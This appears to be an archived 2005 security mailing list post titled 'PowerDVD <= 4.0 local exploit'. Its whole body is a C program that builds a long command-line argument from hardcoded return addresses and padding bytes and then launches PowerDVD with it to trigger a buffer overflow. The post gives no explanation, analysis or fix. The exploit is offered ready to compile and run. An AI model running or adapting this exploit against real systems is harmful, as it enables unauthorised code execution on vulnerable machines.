lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri Aug  5 17:44:51 2005
From: edward11 at postmaster.co.uk (edward GAGNON)
Subject: PowerDVD <= 4.0 local exploit



#include <stdio.h>
#include <string.h>
#include <windows.h>

int main(int argc, char *argv[])
{

char cmd[500];
char *path;

printf("\n\n* usage: pdvdx.exe <path>\n\n");

if ( argc < 2 ) { printf(" need an argument!\n"); exit(0); }

path = argv[1];

sprintf(cmd, "%s ", path);
strcat(cmd, "\x44\x80\xC1\x77");
strcat(cmd, "\xDC\x7A\xC2\x77");
strcat(cmd, "\x35\x13\xC0\x77");

memset(cmd+strlen(cmd), 0x55, 299);

system(cmd);

exit(0);
}


_______________________________________________________________ 
Meet other people who share your interests.

http://www.homemaster.net - Homemaster. Come Together. Online.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ